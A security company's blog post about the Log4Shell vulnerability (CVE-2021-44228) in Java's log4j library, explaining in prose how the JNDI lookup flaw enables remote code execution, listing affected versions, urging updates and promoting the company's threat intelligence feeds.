The latest zero day is a big one. Recently announced, CVE-2021-44228 (dubbed Log4Shell) defines the vulnerability identified in Java’s logging package “log4j”. This CVE is rated the maximum 10 out of 10. The log4j logging package is built into a significant amount of software, including Apple, Apache, iCloud, Steam, Tesla, Minecraft, and many others.
TL;DR:
Critical Path Security has been working non-stop to stay ahead of this threat. Our Threat Intelligence feeds have been updated and rolled out to include detections for these attacks. We worked hand in hand with our trusted cyber-security partners to combine our Threat Intelligence with vulnerability identification mechanisms to provide overwhelming support to our customers against this attack.
Additionally, our world-class researchers, responders, and analysts have been working around the clock since the notification. The team has continually rolled out additional detections and have worked closely with our customers and partners to respond to attacks.
We’ve got your six.
Technical Explanation:
This exploit allows an attacker to pass a certain string of text to the target host which manipulates the host into making unauthorized external connections using log4j’s JNDI external lookup functionality. This external connection can download and execute any remote code. The most widely exploited method for passing this string is by placing it in the User-Agent field, a data component that log4j captures in the logs; however, the string can be located in any from field that uses HTTPS_POST.
The attack is extremely trivial for a threat actor to execute. Once executed, it grants the attacker the ability to execute any code they would like on the target system.
The vulnerable versions of log4j are versions 2.0 through 2.14.1. Version 2.15.0 contains the first fix for this vulnerability. If your systems are using a vulnerable version of log4j, the best option is to update log4j to the latest version. If you cannot update this software immediately, there are other mitigation steps.
With vigilance and wherever possible, update any and all copies of Log4j as soon as you can.
Feeds:
https://github.com/CriticalPathSecurity/Zeek-Intelligence-Feeds
https://github.com/CriticalPathSecurity/Public-Intelligence-Feeds